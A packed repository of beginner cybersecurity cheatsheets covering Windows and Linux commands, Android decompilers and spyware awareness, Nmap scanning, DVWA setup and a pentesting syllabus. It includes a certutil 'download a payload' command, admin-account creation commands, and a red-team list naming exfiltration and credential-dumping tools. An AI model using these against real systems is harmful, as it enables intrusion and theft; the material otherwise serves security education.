├── README.md
├── windows
    └── commands-1.md
├── android
    ├── scrcpy.md
    ├── taking-supreme-access-android.md
    ├── decompilers.md
    └── adb.md
├── syllabus
    └── pentesting.md
├── interface-based-learning
    ├── dvwa.md
    ├── rtt.md
    ├── osi-model-day2.md
    ├── python-projects.md
    ├── nmap-day4.md
    ├── nmap-day3.md
    └── an-intro-to-hacking.py
├── linux
    └── top50s.md
└── web
    └── html-cheatsheet.md

/README.md:
--------------------------------------------------------------------------------
# LearnSheet : `Cheatsheets and clear roadmaps, empowering your learning journey with essential information at your fingertips.`
![image](https://github.com/TechnologyMediaorg/LearnSheet/assets/111997815/d6e072b6-c8d0-445a-bd4d-a70e2d4d54a6)

> - **Team**
> TechnologyMedia org

--------------------------------------------------------------------------------
/windows/commands-1.md:
--------------------------------------------------------------------------------
# List local users
```
net user
```
# Get current user info
```
whoami
whoami /groups
whoami /priv
```
# Add users (local)
```
net user /add
net localgroup Administrators /add
```
# See Running Processes
```
tasklist
wmic process
```
# Kill a process
```
taskkill /PID /F
```
# See Running Services
```
net start
sc query
wmic service get
```
# Capture Packets
```
netsh trace start persistent=yes capture=yes tracefile=.etl
netsh trace stop
```
# Download a payload
```
certutil -urlcache -split -f "https://.zip" .zip
```
# Check for Open Ports (PowerShell)

```
tnc \\computer.domain -Port 80
tnc 10.0.0.1 -Port 443
```

--------------------------------------------------------------------------------
/android/scrcpy.md:
--------------------------------------------------------------------------------
# Scrcpy Cheatsheet

## Installation

- Download scrcpy from the official GitHub repository:
  ```
  git clone https://github.com/Genymobile/scrcpy.git
  ```
- Build and install scrcpy:
  ```
  cd scrcpy
  ./gradlew assembleDebug
  ```
- Connect your Android device to your computer using USB debugging.

## Usage

- Launch scrcpy:
  ```
  ./scrcpy
  ```
- Display device in a specific resolution:
  ```
  ./scrcpy -m 1280
  ```
- Control device using keyboard and mouse:
  - Use mouse to click, drag, and scroll.
  - Use keyboard shortcuts:
    - Ctrl + Left Click: Trigger a right-click event.
    - Ctrl + Shift + H: Hide the device screen.
    - Ctrl + G: Resize the device screen to its original size.
- Record screen and save it as a video:
  ```
  ./scrcpy --record file.mp4
  ```
- Adjust the bitrate for screen recording:
  ```
  ./scrcpy --record file.mp4 --bit-rate 4000000
  ```

--------------------------------------------------------------------------------
/syllabus/pentesting.md:
--------------------------------------------------------------------------------
- [ ] Introduction to Hacking
- [ ] Types of Hackers and Hackings
- [ ] Advantages, Disadvantages and Purpose of Hacking
- [ ] Tools and Terminologies You Should Know
- [ ] Prerequisites
- [ ] The Process and Mindset
- [ ] Reconnaissance
- [ ] Basic Footprinting
- [ ] Domain Name Information
- [ ] Finding IP Address
- [ ] Finding Hosting Company
- [ ] IP Address Ranges
- [ ] History of the website
- [ ] Basic Fingerprinting
- [ ] Port Scanning
- [ ] Ping Sweep
- [ ] DNS Enumeration
- [ ] Basic Sniffing
- [ ] Types of Sniffing
- [ ] Hardware Protocol Analyzers
- [ ] Lawful Interception
- [ ] Working with Sniffing Tools
- [ ] ARP Spoofing
- [ ] Man In The Middle
- [ ] Practicing DNS Poisoning
- [ ] Basic Exploitation
- [ ] Basic Enumeration
- [ ] Working with Metasploit
- [ ] Basic Trojan
- [ ] TCP/IP Hijacking
- [ ] Social Engineering
- [ ] How to gift a virus?
- [ ] Basic Password Hacking
- [ ] Dictionary Attack
- [ ] Hybrid Dictionary Attack
- [ ] Brute-Force Attack
- [ ] Rainbow Tables
- [ ] Basic Wireless Hijacking
- [ ] Exploring Kismet
- [ ] Working with NetStumbler
- [ ] Wired Equivalent Privacy
- [ ] Wireless DoS Attack
- [ ] Working with Botnets
- [ ] Types of DDoS
- [ ] XSS
- [ ] SQL injection
- [ ] Knowing the basics of Penetration Testing

--------------------------------------------------------------------------------
/interface-based-learning/dvwa.md:
--------------------------------------------------------------------------------
# Introduction to DVWA (Damn Vulnerable Web Application) Framework

## Step-by-Step Guide:

1. Installation
   - Download the latest version of DVWA.
     ![image](https://github.com/TechnologyMediaorg/LearnSheet/assets/111997815/d4b3a649-1af8-4658-b859-82c439db899c)

   - Set up a web server environment (e.g., XAMPP or WAMP) on your computer.
     ![image](https://github.com/TechnologyMediaorg/LearnSheet/assets/111997815/f8bb3df3-dacf-40cc-86eb-ee52a09f4474)

   - Extract the DVWA folder into the web server's document root directory.
     ![image](https://github.com/TechnologyMediaorg/LearnSheet/assets/111997815/595c7ed9-1335-45a2-847e-8cadc2e3b71f)

   - Rename "config/config.inc.php.dist" to "config/config.inc.php".
   - Configure the necessary settings (e.g., database credentials) in the "config/config.inc.php" file. Change the username and password to match your own database setup.
   - Start your web server and access the DVWA URL in your browser.

2. Initial Setup
   - Click "Create / Reset Database" to initialize the DVWA database.
     ![image](https://github.com/TechnologyMediaorg/LearnSheet/assets/111997815/1ddbb2c6-f75a-407b-945b-64cb281a790f)

   - Log in using the default username "admin" and password "password".
     ![image](https://github.com/TechnologyMediaorg/LearnSheet/assets/111997815/f3e602df-18c7-4679-9c70-94a2508f60a0)

   - You'll be redirected to the main DVWA dashboard.
     ![image](https://github.com/TechnologyMediaorg/LearnSheet/assets/111997815/a5e3ae64-5cc7-484e-a401-eddc036fef5a)

3. Understanding the Interface
   ![image](https://github.com/TechnologyMediaorg/LearnSheet/assets/111997815/2bbbace0-5f6e-43d3-8c0e-d9f37a039c9b)

   - Vulnerability Selection: Choose a specific vulnerability or security level to work on.
   - Main Menu: Access different vulnerability categories (e.g., SQL injection, XSS, Command Execution).
   - Security Level: Select the desired difficulty level (low to high).
   - Progress Bar: Track your completion progress.

--------------------------------------------------------------------------------
/interface-based-learning/rtt.md:
--------------------------------------------------------------------------------

# RED TEAM TOOLKIT

## Privilege Escalation

- Blood Hunt
- BeRoot

## Phishing

- Gophish
- King Phisher
- Evil URL

## Command and Control

- EmpireProject
- Pupy
- Cobalt Strike

## OSINT (Open Source Intelligence Tool)

- Maltego
- Spiderfoot
- OSINT framework

## Reconnaissance

- Nmap
- Sqlmap
- Shodan
- crt.sh
- OpenVAS
- RustScan
- Nikto
- Amass

## Exfiltration

- SharpExfiltrate
- DNSExfiltrator
- Egress-Assess

## Credential Dumping

- Mimikatz
- Lazagne
- Rypykatz
- Dumpert
- Forkatz
- nanodump

--------------------------------------------------------------------------------
/interface-based-learning/osi-model-day2.md:
--------------------------------------------------------------------------------
TechnologyMedia.org

# TCP/IP MODEL Layers

1. Application -> HTTP, Telnet, FTP, SMTP, DNS, SNMP
2. Transport -> UDP, TCP
3. Network/Internet -> IP, ICMP, ARP
4. Network Interface -> Ethernet, Frame Relay

# OSI MODEL

The OSI model describes the functions of a networking system, while TCP/IP is the protocol suite actually used to interconnect network devices on the internet.

## Layers

1. Application -> HTTP, FTP, SMTP, NFS, Telnet, etc.
2. Presentation -> JPG, PNG, GIF, ASCII, CSS, HTML
3. Session -> RPC, TLS, SCP
4. Transport -> TCP [connection-oriented], UDP
5. Network -> IPv4, IPv6, ICMP, ARP
6. Data link -> MAC, ATM, HDLC, Frame Relay
7. Physical -> Ethernet, USB, DSL, ISDN

- DNS (Domain Name System) -> turns domain names into IP addresses.
- DHCP (Dynamic Host Configuration Protocol) -> dynamically assigns a temporary IP address to any device.
- ARP (Address Resolution Protocol) -> associates an IP address with a MAC address (IP to MAC).
- NAT (Network Address Translation) -> facilitates connections between an external system and an internal system with a private IP address.
- VPN -> provides an encrypted connection to a VPN server and hides your IP address.
- Firewall -> a network security system.
- Router -> needed to connect two or more different networks with each other.
- Switch -> used to connect two or more hosts within the same network or targeted domain.
- Hub -> almost the same as a switch, but it sends data to all connected ports.

--------------------------------------------------------------------------------
/linux/top50s.md:
--------------------------------------------------------------------------------
# Top 50 Linux Commands you must know as a Regular User
![image](https://github.com/TechnologyMediaorg/LearnSheet/assets/111997815/093b0445-7eae-4b73-8c60-e8864a250360)

1. `ls` - view contents of directory (list)
2. `pwd` - path of the current directory
3. `cd` - change directory
4. `mkdir` - make new directory
5. `mv` - move files / rename files
6. `cp` - copy files
7. `rm` - remove files
8. `touch` - create blank new file
9. `rmdir` - delete directory
10. `cat` - list content of file to terminal
11. `clear` - clear terminal window
12. `echo` - print text to the terminal (often redirected to move data into a file)
13. `less` - read text file one screen at a time
14. `man` - show manual of Linux commands
15. `sudo` - enables you to perform tasks that require administrative or root permissions
16. `top` - task manager in terminal
17. `tar` - used to archive multiple files into a tarball
18. `grep` - used to search for words in specific files
19. `head` - view first lines of any text file
20. `tail` - view last lines of any text file
21. `diff` - compares the contents of two files line by line
22. `kill` - used for killing an unresponsive program
23. `jobs` - display all current jobs along with their statuses
24. `sort` - a command line utility for sorting lines of text files
25. `df` - info about system disk
26. `du` - check how much space a file or directory takes
27. `zip` - to compress your files into a zip archive
28. `unzip` - to extract the zipped files from a zip archive
29. `ssh` - a secure encrypted connection between two hosts over an insecure network
30. `cal` - shows calendar
31. `apt` - command line tool for interaction with packaging system
32. `alias` - custom shortcuts used to represent a command
33. `w` - current user info
34. `whereis` - used to locate the binary, source, manual page files
35. `whatis` - used to get one-line man page description
36. `useradd` - used to create a new user
37. `passwd` - used to change the password of the current user
38. `whoami` - print current user
39. `uptime` - print the current time and how long the machine has been running
40. `free` - print free and used memory info
41. `history` - print used commands history
42. `uname` - print detailed information about your Linux system
43. `ping` - to check connectivity status to a server
44. `chmod` - to change permissions of files and directories
45. `chown` - to change ownership of files and directories
46. `find` - searches for files and directories
47. `locate` - used to locate a file, just like the search command in Windows
48. `ifconfig` - print IP address stuff
49. `ip a` - similar to ifconfig but shortest print
50. `finger` - gives you a short dump of info about a user

--------------------------------------------------------------------------------
/interface-based-learning/python-projects.md:
--------------------------------------------------------------------------------
# Get Started with: Python Cybersecurity Projects
> These Python projects are aimed at enhancing cybersecurity measures and can serve as valuable learning experiences for developers interested in this domain.

### 1. Network Scanner
> A tool to scan networks, identify open ports, services, and vulnerabilities. Utilizes libraries like Scapy or Nmap.

### 2. Password Manager
> Develops a secure password manager emphasizing encryption and security best practices for storing and managing passwords.

### 3. Intrusion Detection System (IDS)
Builds a system to monitor network traffic, alerting on suspicious or malicious activities using techniques like Snort rules.

### 4. Vulnerability Scanner
Designs a tool to identify security weaknesses in web applications or network services, integrating tools like Nikto, OWASP ZAP, or Nessus.

### 5. Honeypot
Sets up a system that simulates vulnerable services to attract attackers, providing insights into common attack patterns.

### 6. Network Packet Sniffer
Creates a tool to capture and analyze network packets, identifying potential security threats.

### 7. File Encryption/Decryption Tool
Builds a tool using strong cryptographic algorithms like AES for encrypting and decrypting files with secure key management.

### 8. Malware Analysis Tool
Develops a tool to analyze and reverse-engineer malware, understanding behavior and identifying indicators of compromise (IoCs).

### 9. Phishing Detection System
Utilizes machine learning or deep learning techniques to detect phishing emails or websites.

### 10. Secure Chat Application
Develops a chat app with end-to-end encryption, ensuring user privacy and data security.

### 11. Firewall Rule Analyzer
Creates a tool to analyze and suggest improvements for firewall rules, enhancing network security.

### 12. Security Information and Event Management (SIEM) System
Develops a system to collect, analyze, and correlate security event logs for threat detection and incident response.

### 13. Security Awareness Training Platform
A platform for educating users on cybersecurity best practices, simulating various security scenarios for training.

### 14. Two-Factor Authentication (2FA) System
Builds a system providing an additional layer of security for user accounts or applications.

### 15. Security Dashboard
Designs a dashboard that aggregates and visualizes security-related data from various sources, providing insights into organizational security posture.

### 16. USB Device Control Tool
Develops a tool to control and monitor USB devices connected to a computer, preventing unauthorized data transfers.

### 17. Threat Intelligence Feed Aggregator
Creates a system that aggregates threat intelligence feeds, providing real-time information on threats and vulnerabilities.

### 18. Security Policy Compliance Checker
Builds a tool to check if an organization's systems and policies comply with security standards and regulations.

Remember: prioritize security, follow best practices for coding, and utilize appropriate encryption and authentication methods in these projects.

--------------------------------------------------------------------------------
/android/taking-supreme-access-android.md:
--------------------------------------------------------------------------------
Today, we will discuss the topic of "How a hacker gains supreme access to your personalized smartphone?"

> "Android was built to be very secure."
> ~ Sundar Pichai

![Android with malware](https://github.com/offsecnepal/LearnSheet/assets/111997815/dce5034a-584b-43eb-98af-93c817fab32d)

There are various methods that hackers employ to infiltrate Android systems or exploit common vulnerabilities. The most prevalent method is phishing. In the initial stages, an attacker pretends to be an authentic and recognized service or product to manipulate the victim. Once the victim opens and executes the tempting service, it operates as directed by the attacker, providing the attacker with the access they seek.

We've listed some common lures that attackers use to deceive victims before executing the payload, with what each one targets in parentheses:

- Event wishing (Camera & IP)
- Fake Bank Link (Credentials, Account Information, OTP)
- Lottery spinner (Adware)
- User Interest Related Content Link (APK download -> Factory Reset, SMS spy, Gallery spy, clipboard hijacking)
- Fake selfie camera (Location, Camera & IP)
- Live YouTube Link (Camera & IP)
- Meeting Link (Location, Camera & IP)
- Fake Unlocked APK (APK download -> Adware)
- System Update APK (APK download -> Factory Reset, SMS spy, Gallery spy, clipboard hijacking)
- And more

These are recently and commonly used application packages that are easily accessible, even to someone who has just begun searching "how to hack Android?":

- Smseye app.apk
- xphantom apk
- HXPDucky.apk
- Helloboy.apk
- System Update.apk
- Gallery eye.apk
- Location eye.apk

Since these applications conceal themselves from the user, it is challenging to determine whether an Android device has been compromised. A hacked Android device behaves similarly to a normal, older Android mobile. However, there are some signs you may notice when a malicious application is installed on an Android device:

- Pop-ups
- Unknown SMS or calls
- High data usage
- Excessive battery drain
- Overheating
- Reduced performance
- Unusual website behavior
- Unrecognized apps

If you find yourself in such a situation, we recommend taking the following steps immediately to protect yourself from exploitation:

- Delete unrecognized apps
- Run anti-malware software
- Perform a system restore
- Reset passwords
- Inform your contacts
- Notify your service provider
- Report the incident to local law enforcement

# Recent Android Spyware: SpyNote

![Spynote Android Trojan](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRDrb0x9EAmzx0XTLVrEsK_rk0VtLmu96T1HtOBwR02i6hppBsmf0KLoVHLVOj14DgPAnqdx1KV-sbHnVlWcMif96mdXpEnywNHAvoRbjTmkSiqVxX8NorXJzjf3WtJgwlLVPzW9OQ2Tnx-MMGo2pcwSreXwT_FFMzKyAHMzu3eC9JQks5yYf2gbnZUZMU/s728-rw-ft-e30/android.jpg)

According to F-Secure researchers, SpyNote is primarily distributed through SMS phishing campaigns. It tricks potential victims into installing the app by enticing them to click on an embedded link. For more information, you can [read more](https://timesofindia.indiatimes.com/gadgets-news/this-android-banking-trojan-can-record-audio-phone-calls-to-steal-data/articleshow/104484863.cms).

--------------------------------------------------------------------------------
/interface-based-learning/nmap-day4.md:
--------------------------------------------------------------------------------

## Download Nmap

[image]

## Full Open Scan (sT)

An sT scan is a type of network scan performed using Nmap, a popular network exploration tool. The sT scan, also known as a full open scan, attempts to establish a full TCP connection with each of the target system's ports: it sends a TCP SYN packet, waits for a SYN/ACK response indicating an open port, and then completes the handshake with an ACK. By analyzing the responses, the sT scan reveals the status of ports, identifying whether they are open, closed, or filtered. However, unlike stealth scans, sT scans are more likely to be detected by intrusion detection systems (IDS) or firewalls due to the full TCP connection establishment.

[image]

## Stealth Scan

A stealth scan, also known as a SYN scan, is a network scanning technique used to gather information about open ports on a target system while minimizing the chances of detection. Instead of completing the TCP handshake, a stealth scan sends SYN packets to the target's ports and never sends the final ACK. By analyzing the responses received, the scanner can determine if a port is open, closed, or filtered. Stealth scans are preferred in situations where stealthiness and evasion of intrusion detection systems (IDS) or firewalls are desired.
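
The difference between the full open (sT) scan and the stealth (SYN) scan described above shows up in how each probe's handshake ends, which is what a detection rule can key on. This added example (not part of the original cheatsheet) classifies constructed packet summaries; the addresses, the tuple format and all function names are assumptions made for illustration.

```python
from collections import defaultdict

TARGET = "192.0.2.10"  # constructed address (documentation range)


def probe(src, port, outcome):
    """Build constructed packet summaries for one probe.

    Each packet is (src, dst, dport, direction, flags). Direction "c" is
    client -> target, "s" is target -> client. Flags: S=SYN, A=ACK, R=RST.
    """
    pkts = [(src, TARGET, port, "c", "S")]
    if outcome == "closed":            # target refuses with RST/ACK
        pkts.append((src, TARGET, port, "s", "RA"))
    elif outcome == "half":            # SYN scan: SYN/ACK answered with RST
        pkts += [(src, TARGET, port, "s", "SA"), (src, TARGET, port, "c", "R")]
    elif outcome == "full":            # connect scan: handshake completed
        pkts += [(src, TARGET, port, "s", "SA"), (src, TARGET, port, "c", "A"),
                 (src, TARGET, port, "c", "RA")]
    return pkts                        # "filtered": the SYN gets no reply


def build_sample():
    """Two scanners sweep six ports; a third host is an ordinary client."""
    layout = {21: "closed", 22: "open", 23: "filtered",
              80: "closed", 443: "open", 3389: "closed"}
    pkts = []
    for src, style in (("10.0.0.5", "full"), ("10.0.0.6", "half")):
        for port, state in layout.items():
            pkts += probe(src, port, style if state == "open" else state)
    pkts += probe("10.0.0.7", 443, "full")
    return pkts


def classify_flow(events):
    """Classify one flow from its ordered (direction, flags) events."""
    if ("c", "S") not in events:
        return "other"
    if ("s", "SA") not in events:
        refused = any(d == "s" and "R" in f for d, f in events)
        return "closed" if refused else "filtered"
    # Port is open: did the client finish the three-way handshake?
    for direction, flags in events[events.index(("s", "SA")) + 1:]:
        if direction == "c":
            completed = "A" in flags and "R" not in flags
            return "open-full" if completed else "open-half"
    return "open-half"  # SYN/ACK was never acknowledged


def detect_scans(packets, min_ports=5):
    """Flag (src, dst) pairs touching many ports and name the scan style."""
    flows = defaultdict(list)
    for src, dst, dport, direction, flags in packets:
        # Simplification: one probe per port, so source ports are ignored.
        flows[(src, dst, dport)].append((direction, flags))
    per_pair = defaultdict(dict)
    for (src, dst, dport), events in flows.items():
        per_pair[(src, dst)][dport] = classify_flow(events)
    findings = {}
    for pair, ports in per_pair.items():
        if len(ports) < min_ports:
            continue  # too few distinct ports to call it a sweep
        states = set(ports.values())
        if "open-half" in states and "open-full" not in states:
            kind = "syn-scan"
        elif "open-full" in states and "open-half" not in states:
            kind = "connect-scan"
        elif "open-half" in states:
            kind = "mixed"
        else:
            kind = "undetermined"  # no open port seen, styles look identical
        findings[pair] = {"type": kind, "ports": ports}
    return findings


if __name__ == "__main__":
    for (src, dst), info in detect_scans(build_sample()).items():
        print(src, "->", dst, info["type"], info["ports"])
```

On closed and filtered ports the two scan types look the same on the wire, so the label depends on at least one open port being probed.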

[image]

## sV (Service Version Detection)

An sV scan is a network scanning technique performed using Nmap, a versatile network exploration tool. The sV scan focuses on service version detection by interrogating the target system's open ports. It aims to identify the specific services running on those ports and gather information about their versions. By analyzing the responses received from the target, the sV scan provides insights into the software and versions used by the services, aiding in further analysis and potential vulnerability assessment. This scan is particularly useful for understanding the network landscape and identifying potential security risks associated with outdated or vulnerable service versions.

[image]

## View NSE (Nmap Scripting Engine) scripts for Windows users

[image]

## Use script

[image]

--------------------------------------------------------------------------------
/android/decompilers.md:
--------------------------------------------------------------------------------
# APK decompilers

1. **jadx-gui**:
   - First famous GUI Java decompiler; you can use it to investigate the Java code from the APK once you have obtained it.
   - Built in Java (multi-platform) and, at this moment, the recommended one.
   - Just download the latest version and execute it from the bin folder:
     ```
     jadx-gui
     ```
   - Using the GUI you can perform text search, go to function definitions (CTRL + left click on the function), and find cross-references (right click --> Find Usage).
   - If you only want the Java code without using a GUI, a very easy way is to use the jadx CLI tool:
     ```
     jadx app.apk
     ```
   - Some interesting options of jadx (GUI and CLI versions) are:
     ```
     -d
     --no-res #No resources
     --no-src #No source code
     --no-imports #Always write the entire package name (very useful to know where the function that you might want to hook is)
     ```

2. **GDA**:
   - A powerful and fast reverse analysis platform that supports basic decompiling operations and many other functions, such as malicious behavior detection, privacy leak detection, vulnerability detection, path solving, packer identification, variable tracking analysis, deobfuscation, Python & Java scripts, device memory extraction, and data decryption and encryption.
   - Only available for Windows.

3. **Bytecode-Viewer**:
   - Another interesting tool for static analysis.
   - It allows you to decompile the APK using several decompilers at the same time. For example, you can see 2 different Java decompilers and one Smali decompiler. It also allows you to modify the code and export it.
   - One limitation of Bytecode-Viewer is that it doesn't have references or cross-references.

4. **Enjarify**:
   - A tool for translating Dalvik bytecode to equivalent Java bytecode, allowing Java analysis tools to analyze Android applications.

5. **Dex2jar**:
   - An older tool that translates Dalvik to Java bytecode.
   - It works well most of the time but may fail or produce incorrect results in some cases.
   - Enjarify is designed to handle more cases compared to Dex2jar, including obscure features or edge cases.

6. **CFR**:
   - A decompiler that can handle modern Java features (e.g., lambda expressions, try-with-resources, and method references).
   - Written entirely in Java 6, so it works anywhere.
   - It can also decompile class files from other JVM languages back into Java.
   - To use CFR, run its JAR file as follows:
     ```
     java -jar ./cfr.jar "$JARFILE" --outputdir "$OUTDIR"
     ```
     For larger JAR files, you may need to increase the memory allocation pool of the JVM.

7. **Fernflower**:
   - Part of the IntelliJ IDEA project.
   - Fernflower is an analytical decompiler that outputs the generated .java files in a JAR file.
   - To build and use Fernflower, you need to follow specific instructions. Please refer to the project's GitHub page for details.

8. **Krakatau**:
   - A decompiler written in Python.
   - It requires external class definitions (libraries) and can handle standard library classes up to Java version 8.
   - You can use Krakatau to decompile JAR files by providing the necessary dependencies using the `-path` flag.
   - Please refer to Krakatau's GitHub page for detailed instructions on usage.

9. **Procyon**:
   - Once installed, you can use Procyon to decompile JAR files straightforwardly.
   - Usage example:
     ```
     procyon -jar "$JARFILE" -o "$OUTDIR"
     ```

References:
- [jadx-gui GitHub](https://github.com/skylot/jadx)
- [GDA GitHub](https://github.com/charles2gan/GDA-android-reversing-Tool)
- [Bytecode-Viewer GitHub](https://github.com/Konloch/bytecode-viewer)
- [Enjarify GitHub](https://github.com/google/enjarify)
- [CFR GitHub](https://github.com/leibnitz27/cfr)
- [Fernflower GitHub](https://github.com/JetBrains/intellij-community/tree/master/plugins/java-decompiler/engine)
- [Krakatau GitHub](https://github.com/Storyyeller/Krakatau)
- [Procyon GitHub](https://bitbucket.org/mstrobel/procyon)

--------------------------------------------------------------------------------
/interface-based-learning/nmap-day3.md:
--------------------------------------------------------------------------------

# Network-Based Vulnerability Assessment and Nmap Guide for Servers

## Step 1: Install Nmap

Ensure that Nmap is installed on your system. You can download the latest version from the official Nmap website or use package managers specific to your operating system.

## Step 2: Identify the Target Server

Determine the IP address or hostname of the server you want to assess for vulnerabilities. This information will be used in the subsequent steps.

## Step 3: Scan for Open Ports

Open a terminal or command prompt and run the following Nmap command:

```
nmap <target IP or hostname>
```

This command will scan the target server for open ports and display the services running on each port.

## Step 4: Perform Service Version Detection

To identify the version and type of services running on the open ports, run the following Nmap command:

```
nmap -sV <target IP or hostname>
```

Nmap will analyze the services and attempt to determine their versions. This information is valuable for identifying vulnerabilities associated with specific service versions.

## Step 5: Conduct Operating System Fingerprinting

To determine the type and version of the operating system running on the target server, use the following Nmap command:

```
nmap -O <target IP or hostname>
```

Nmap will perform operating system fingerprinting based on network responses, providing insights into potential vulnerabilities related to the identified operating system.

## Step 6: Utilize Vulnerability Scanning Scripts

Nmap's NSE (Nmap Scripting Engine) provides numerous scripts that can be used for vulnerability scanning. Run specific scripts against the target server using the following command:

```
nmap --script=<script name> <target IP or hostname>
```

Replace `<script name>` with the name of the desired script. Examples include `vulners` for vulnerability scanning, `http-vuln-*` for web application vulnerabilities, and `ssl-heartbleed` for detecting the Heartbleed vulnerability.

## Step 7: Customize Timing and Stealth Options

Nmap offers different timing and stealth options to adjust the scan's aggressiveness and reduce the likelihood of detection. Experiment with options like `-T<timing level>` (e.g., `-T4` for aggressive scans) and `--scan-delay <time>` to fine-tune the scanning process.

## Step 8: Analyze Nmap Output

Carefully review the Nmap output after the scan is complete. Analyze open ports, service versions, and identified vulnerabilities. Pay special attention to critical vulnerabilities that pose a high risk to server security.

## Step 9: Take Remedial Action

Based on the vulnerabilities identified, take appropriate measures to address them. This may involve applying security patches, updating software versions, or reconfiguring server settings to mitigate the risks.

## Step 10: Schedule Regular Scans

Perform network-based vulnerability assessments on a regular basis to ensure ongoing server security. Schedule Nmap scans periodically, especially after making changes to server configurations or applying updates.
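
Steps 8 and 10 can be combined by comparing each scheduled scan against a known-good baseline. The following is an added example, not part of the original guide: it assumes the `-sV` scans of your own server were saved with Nmap's XML output option (`-oX`), the two XML documents are constructed samples, and the function names are hypothetical.

```python
import xml.etree.ElementTree as ET

# Constructed sample: baseline scan of a server you administer.
BASELINE_XML = """<nmaprun scanner="nmap">
  <host>
    <status state="up"/>
    <address addr="192.0.2.10" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22"><state state="open"/>
        <service name="ssh" product="OpenSSH" version="8.9p1"/></port>
      <port protocol="tcp" portid="80"><state state="open"/>
        <service name="http" product="nginx" version="1.18.0"/></port>
      <port protocol="tcp" portid="3306"><state state="closed"/>
        <service name="mysql"/></port>
      <port protocol="tcp" portid="8080"><state state="open"/>
        <service name="http-proxy"/></port>
    </ports>
  </host>
</nmaprun>"""

# Constructed sample: a later scheduled scan of the same server.
CURRENT_XML = """<nmaprun scanner="nmap">
  <host>
    <status state="up"/>
    <address addr="192.0.2.10" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22"><state state="open"/>
        <service name="ssh" product="OpenSSH" version="8.9p1"/></port>
      <port protocol="tcp" portid="80"><state state="open"/>
        <service name="http" product="nginx" version="1.24.0"/></port>
      <port protocol="tcp" portid="3306"><state state="open"/>
        <service name="mysql" product="MySQL" version="5.7.40"/></port>
      <port protocol="tcp" portid="8080"><state state="closed"/>
        <service name="http-proxy"/></port>
    </ports>
  </host>
</nmaprun>"""


def parse_open_services(xml_text):
    """Return {(address, protocol, port): service label} for open ports."""
    services = {}
    root = ET.fromstring(xml_text)
    for host in root.iter("host"):
        addr_el = host.find("address[@addrtype='ipv4']")
        if addr_el is None:
            addr_el = host.find("address")
        if addr_el is None:
            continue  # host entry without an address: nothing to key on
        addr = addr_el.get("addr")
        for port in host.iter("port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue
            svc = port.find("service")
            label = ""
            if svc is not None:
                # Prefer the detected product; fall back to the service name.
                parts = [svc.get("product") or svc.get("name"),
                         svc.get("version")]
                label = " ".join(p for p in parts if p)
            key = (addr, port.get("protocol"), int(port.get("portid")))
            services[key] = label or "unknown"
    return services


def diff_scans(baseline, current):
    """Report ports that opened, closed, or changed service/version."""
    return {
        "opened": sorted(k for k in current if k not in baseline),
        "closed": sorted(k for k in baseline if k not in current),
        "changed": sorted((k, baseline[k], current[k]) for k in current
                          if k in baseline and baseline[k] != current[k]),
    }


if __name__ == "__main__":
    report = diff_scans(parse_open_services(BASELINE_XML),
                        parse_open_services(CURRENT_XML))
    for category, entries in report.items():
        print(category, entries)
```

A newly opened port or an unexpected version change between scheduled scans is the item to investigate first in Step 9.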

--------------------------------------------------------------------------------
/interface-based-learning/an-intro-to-hacking.py:
--------------------------------------------------------------------------------
import os
import pywhatkit


def clear_screen():
    os.system('cls' if os.name == 'nt' else 'clear')


def display_title():
    clear_screen()
    print("\033[1;34m=== Introduction to Hacking ===\033[0m")
    print("The Hacking Manual welcomes you!")
    print("With this tool, you will cover the basics of ethical hacking and cybersecurity.")
    print("Let's get started!\nAuthor: Dev. Gautam Kumar@TechnologyMedia")


def display_menu():
    print("\033[1mMenu:\033[0m")
    print("1. \033[1;32mIntroduction to Ethical Hacking\033[0m")
    print("2. \033[1;33mSetting up Your Hacking Environment\033[0m")
    print("3. \033[1;36mReconnaissance and Information Gathering\033[0m")
    print("4. \033[1;35mExploitation Techniques\033[0m")
    print("5. \033[1;31mPost-Exploitation and Maintaining Access\033[0m")
    print("6. \033[1;33mSocial Engineering\033[0m")
    print("7. \033[1;36mWeb Application Security\033[0m")
    print("8. \033[1;32mCapture the Flag (CTF) Challenges\033[0m")
    print("9. \033[1;35mAdditional Resources\033[0m")
    print("0. \033[1;31mExit\033[0m")


def select_option():
    choice = input("\nEnter the option number to continue: ")
    return choice


def process_option(choice):
    if choice == '1':
        display_topic("Introduction to Ethical Hacking",
                      "Ethical hacking is the practice of identifying vulnerabilities and securing computer systems and networks. This guide provides an overview of ethical hacking and its importance in cybersecurity.")
    elif choice == '2':
        display_topic("Setting up Your Hacking Environment",
                      "Setting up a hacking environment is crucial for ethical hackers. This guide helps you set up your hacking environment with the necessary tools and software.")
    elif choice == '3':
        display_topic("Reconnaissance and Information Gathering",
                      "Reconnaissance involves gathering information about a target to assess its vulnerabilities. This guide covers techniques for reconnaissance and information gathering in ethical hacking.")
    elif choice == '4':
        display_topic("Exploitation Techniques",
                      "Exploitation techniques are used to gain unauthorized access to computer systems or networks. This guide explores various exploitation techniques, including network and application-level attacks.")
    elif choice == '5':
        display_topic("Post-Exploitation and Maintaining Access",
                      "Post-exploitation involves activities performed after gaining access to a target system. This guide focuses on post-exploitation and maintaining access in ethical hacking scenarios.")
    elif choice == '6':
        display_topic("Social Engineering",
                      "Social engineering is the art of manipulating individuals to gain unauthorized access to information or systems. This guide delves into social engineering techniques and their use in ethical hacking.")
    elif choice == '7':
        display_topic("Web Application Security",
                      "Web applications often have vulnerabilities that can be exploited by attackers. This guide covers web application security and common vulnerabilities, such as SQL injection and cross-site scripting (XSS).")
    elif choice == '8':
        display_topic("Capture the Flag (CTF) Challenges",
                      "Capture the Flag (CTF) challenges are cybersecurity competitions that test participants' hacking skills. This guide introduces CTF challenges and provides resources to practice your hacking abilities.")
    elif choice == '9':
        display_topic("Additional Resources for getting started with hacking", "Additional resources related to hacking!")
    elif choice == '0':
        clear_screen()
        print("Thank you for exploring the world of ethical hacking!")
        print("Stay curious, keep learning, and always hack ethically.")
        print("Goodbye!")
    else:
        print("\033[91mInvalid option. Please try again.\033[0m")


def display_topic(title, summary):
    clear_screen()
    print(f"\033[1;34m=== {title} ===\033[0m")
    print(summary)
    # Opens a YouTube video matching the topic title in the default browser.
    pywhatkit.playonyt(title)


def run_workshop():
    display_title()
    while True:
        display_menu()
        option = select_option()
        if option == '0':
            # Show the goodbye message before leaving the loop.
            process_option(option)
            break
        process_option(option)
        input("\nPress Enter to continue...")
        display_title()


run_workshop()

